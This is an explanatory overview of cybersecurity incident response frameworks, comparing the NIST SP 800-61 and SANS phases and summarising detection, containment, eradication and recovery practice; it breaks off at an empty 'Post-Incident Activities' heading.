Incident response frameworks and phases provide structured methodologies for organizations to detect, contain, analyze, eradicate, recover from, and learn from cybersecurity incidents in a coordinated manner.
These frameworks, such as NIST SP 800-61 and SANS, outline sequential steps that minimize damage, ensure evidence preservation, and improve future resilience, integrating forensics throughout for attribution and legal compliance.
Essential in computer and cyber forensics, they guide teams through chaos, turning reactive firefighting into systematic processes that align technical response with business continuity.
NIST Incident Response Framework
NIST SP 800-61 defines four primary phases, emphasizing preparation and iterative execution.
Preparation establishes policies, teams, tools, and training; baselines define normalcy. Detection and analysis triages alerts via SIEM/EDR, correlating logs for scope. Containment, eradication, and recovery overlap—contain spread (isolate networks), eradicate root causes (patch/remove malware), then recover (restore from backups).
Post-incident activity reviews effectiveness, updating playbooks.
SANS Incident Response Model
SANS expands to six phases, offering granular checklists for execution.
Preparation mirrors NIST, building runbooks. Identification confirms incidents via anomalies. Containment short-term (firewall rules) vs. long-term (reimaging). Eradication hunts remnants; recovery validates clean state. Lessons learned documents gaps.
Widely adopted for its practicality in enterprise environments.
Preparation Phase Details
Proactive readiness prevents chaos.
Detection and Analysis Phase
Rapid triage scopes impact.
SIEM alerts trigger; analysts pivot on IOCs (hashes, IPs). Volatility tiers guide acquisition (RAM first). Hypothesis-driven: "Phishing → Lateral → Ransomware?" Correlate endpoint/network/cloud logs.
Tools: Splunk queries, Elastic Timeline Explorer.
Containment, Eradication, Recovery
Action halts progression while preserving evidence.
Short-term containment: Network ACLs, endpoint isolation. Eradication: Malware removal, credential rotation, patch deployment. Recovery: Phased restoration from verified backups; validate with scans.
Forensics runs parallel—image pre-containment.
Post-Incident Activities
